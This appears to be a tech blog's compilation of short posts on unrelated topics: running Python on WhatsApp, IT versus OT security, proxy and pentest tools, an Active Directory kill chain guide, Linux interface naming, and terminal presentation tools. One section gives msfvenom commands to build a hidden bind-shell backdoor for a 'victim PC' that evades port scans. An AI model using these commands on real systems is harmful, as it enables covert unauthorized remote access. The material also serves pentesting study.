Run Python Code on WhatsApp

Ever thought of running simple python code on your WhatsApp (mobile phone). 

In this tutorial we will see how can the author convert the regular whatsapp chats to python code and execute them on whatsapp. This project is a small IDE which runs on whatsapp and can do all the functionalities of python on whatsapp.

In the full tutorial, the author will be creating a bot to run python codes on WhatsApp. It will be kind of creating his own code editor.

Links:

• Full Tutorial - https://www.youtube.com/watch?v=hW3zfd0mIfw
• Python on WhatsApp - https://github.com/pyGuru123/Python-on-WhatsApp
  

IT vs. OT - What is OT and how is it different from IT

 

IT vs. OT

 In this video, James Cabe and Anthony Bartolo as they discuss how Microsoft is approaching cybersecurity for Industry 4.0 using Azure Defender for IoT, including:

• learn about the differences between Operational Technology (OT) and Industrial Control Systems (ICS)
• gain an understanding of how this compares to the modern Internet of Things (IoT)
• the challenges of securing OT networks
•  how ladder logic can cause cascading impacts
•  how to use the Purdue model to help with communications between the IT and OT security teams as they build a cohesive end-to-end protection solution for modern cyber attacks

 

Links:

• https://www.youtube.com/watch?v=TliTTBi6Do8
  

Windows Shellcode Behind Closed Port

This is a simple tactic to hide a TCP shellcode for Windows platform. 

With msfvenom, generate a payload for victim PC (Windows machine) utilizing shell_hidden _bind_tcp and output a file with .exe format.

msfvenom -p windows/shell_hidden_bind_tcp ahost=[Attacker’s IP] lport=[TCP_Port] -f exe > file.exe

msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.1.203 lport=4321 -f exe > file.exe

This hidden Bind TCP shell listens for connections from the host’s IP address (Ahost) and responds with an RST packet to other connections. It makes the port appear closed, allowing us to disguise the Shellcode.

With netstat, the port will appear as LISTENING. However, when scanning the port with any scanner, we will get "closed" state. To connect the the backdoor (from the Ahost IP address), use netcat.

Below is the description at Rapid7.

Description

Listen for a connection from certain IP and spawn a command shell. The shellcode will reply with a RST packet if the connections is not coming from the IP defined in AHOST. This way the port will appear as "closed" helping us to hide the shellcode.

Author(s)

    vlad902 <vlad902@gmail.com>
    sd
    Borja Merino <bmerinofe@gmail.com>

Platform

Windows

Architectures

x86

Links:

• https://www.hackingarticles.in/metasploit-for-pentester-windows-hidden-bind-shell/
• https://www.ehacking.net/2021/10/how-to-hide-shellcode-behind-closed-port.html
• https://www.rapid7.com/db/modules/payload/windows/shell_hidden_bind_tcp/
  

Abhinavsingh Proxy.py

Do you need a lightweight proxy server that support HTTP/HTTPS/HTTP2/WebSockets, to facilitate end-to-end testing?

Here's a stripped-down version of lightweight proxy server (written in Python).

 

Summary:

• Fast and scalable and lightweight
  
• Programmable (with plugins)
  
• Real time dashboard
• Supports: HTTP (1.0, 1.1, 2.0), HTTPS and websockets
• IPv4 and IPv6 support
• Basic authentication support

 

Links:

•  https://github.com/abhinavsingh/proxy.py
  

Azure Stormspotter

 

StormSpotter

A visualization pentest tool for Azure subscription.

Stormspotter creates an “attack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work.

You can run it with or without docker. Just follow the instruction at https://github.com/Azure/Stormspotter

 

Guide and Tools for AD Kill Chain Attack & Defense

Tushar is kind enough to compile a complete guide and tools for Active Directory kill chain attack and defense. 

It covers the tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise AD and guidance to mitigation, detection, and prevention. 

1. Discovery
2. Privilege Escalation
3. Domain Trusts
4. Lateral Movement
5. Defense Evasion
6. OpSec
7. Credential Dumping
8. Persistence
9. Tools, Scripts, eBooks, Cheatsheets
10. Defense and Detection
11. Active Directory Security Checks

Links:

• https://cybersecuritynews.com/active-directory-checklist/ 
  

Consistent network interface device naming

Ever wondering why the traditional network interface naming such as eth0 is renamed as ens33 nowadays?

This is known as Predictable Network Interface naming and is part of systemd/udev, since v197. 

In the past, UNIX naming scheme probe for hardware occurs in no particular order and may change between reboots. Ever since systemd v197, the interface name depens on the physical location of hardware and can be predicted/guessed by looking at lspci or lshw output.  This can have serious security implications, for example in firewall rules which are coded for certain naming schemes, and which are hence very sensitive to unpredictable changing names.

With systemd 197 there are different naming policies added into systemd/udevd by default. The following different naming schemes for network interfaces are now supported by udev natively:

1. Names incorporating Firmware/BIOS provided index numbers for on-board devices (example: eno1)
2. Names incorporating Firmware/BIOS provided PCI Express hotplug slot index numbers (example: ens1)
3. Names incorporating physical/geographical location of the connector of the hardware (example: enp2s0)
4. Names incorporating the interfaces's MAC address (example: enx78e7d1ea46da)
5. Classic, unpredictable kernel-native ethX naming (example: eth0)

By default, systemd v197 will now name interfaces following policy 1) if that information from the firmware is applicable and available, falling back to 2) and subsequently 3) 4) 5).

 

Below is the network interface naming hierarchy captured from RedHat Enterprise website.

Network interface device naming hierarchy

When consistent device naming is enabled (default), the udev device manager generates device names based on the following schemes:

Scheme	Description	Example
1	Device names incorporate firmware or BIOS-provided index numbers for onboard devices. If this information is not available or applicable, udev uses scheme 2.	eno1
2	Device names incorporate firmware or BIOS-provided PCI Express (PCIe) hot plug slot index numbers. If this information is not available or applicable, udev uses scheme 3.	ens1
3	Device names incorporate the physical location of the connector of the hardware. If this information is not available or applicable, udev uses scheme 5.	enp2s0
4	Device names incorporate the MAC address. Red Hat Enterprise Linux does not use this scheme by default, but administrators can optionally use it.	enx525400d5e0fb
5	The traditional unpredictable kernel naming scheme. If udev cannot apply any of the other schemes, the device manager uses this scheme.	eth0

To disable "Predictable Network Interface Names" (Ubuntu):

•     Edit your /etc/default/grub changing the line from

    GRUB_CMDLINE_LINUX=""
    to
    GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"

•     and, finally update and reboot your system:

    $ sudo grub-mkconfig -o /boot/grub/grub.cfg
  $ sudo update-grub && sudo reboot

Links:

• https://systemd.io/PREDICTABLE_INTERFACE_NAMES/
• Consistent network interface device naming
• https://www.freedesktop.org/wiki/Software/systemd/PredictableNetworkInterfaceNames/
  
• https://major.io/2015/08/21/understanding-systemds-predictable-network-device-names/
  

Presentation from Command Line

Today, I'm going to share my view on those command line presentation tools that I tried. 

Good and bad with command line presentation tools.

- Cannot never win any design award.
- fonts might be too small.
+ help to FOCUS.

 

mdp - Markdown Presentation

• uses single markdown text file.
• can be converted to HTML and PDF (with additional tools).
  

tpp - Text Presentation Program

• uses own formatting (instead of markdown).
• colorful

 

vimdeck - VIM as a presentation tool

• uses makrdown + ruby + SyntaxRange
  
• supports H1/H2/Images (to ascii), and fenced code blocks.
• supports highlighting syntax.
  

vtmc - Video Terminal Master of Ceremonies

• uses node.js (javascript) + multiple text files (stored at a folder).
• uses custom formatting.
  
• same author as https://github.com/jclulow/terminal-heatmap
  

 

tkn - Terminal Keynote

• uses ruby and png files.
• supports code, center, block, image, section.
• can be converted to PDF.

 

tiptip - Terminal Plain-text Presentations

• uses CoffeeScript.
  

 

patat - Presentation Atop The ANSI Terminal

• uses pandoc (markdown/LaTeX) to parse the slides.
• largely based upon MDP and VTMC
• support different running options.
• support YAML configuration (at 2 places).
  

 

 lookatme - LookAtMe

• uses markdown notation.
• supports live code, images, 
• live terminal.
• options for different types of rendering. 

 

Links:

• mdp - https://github.com/visit1985/mdp
• tpp - https://synflood.at/tpp.html
• vimdeck - https://github.com/tybenz/vimdeck
• vtmc - https://github.com/jclulow/vtmc
• vtmc_box - https://github.com/justin2004/vtmc_box
• tkn - https://github.com/fxn/tkn
• tiptip - https://github.com/felixrabe-attic/mcrio--tiptip
• patat - https://github.com/jaspervdj/patat
• lookatme - https://github.com/d0c-s4vage/lookatme
  

Side-by-Side Comparison with Linux command

"sdiff" a very useful utility to compare the result side-by-side.  For example, I can compare the output of the 2 nmap results as below:

 $ sdiff -bW <(nmap -sV -p 80 192.168.31.1) <(nmap -sV -p 80 192.168.1.254) 

Comparing port 80

A more complex example, such as:

$ sdiff -bW <(nmap --script ssh2-enum-algos -sV -p 22 23.96.21.205 -Pn) <(nmap --script ssh2-enum-algos -sV -p 22 127.0.0.1)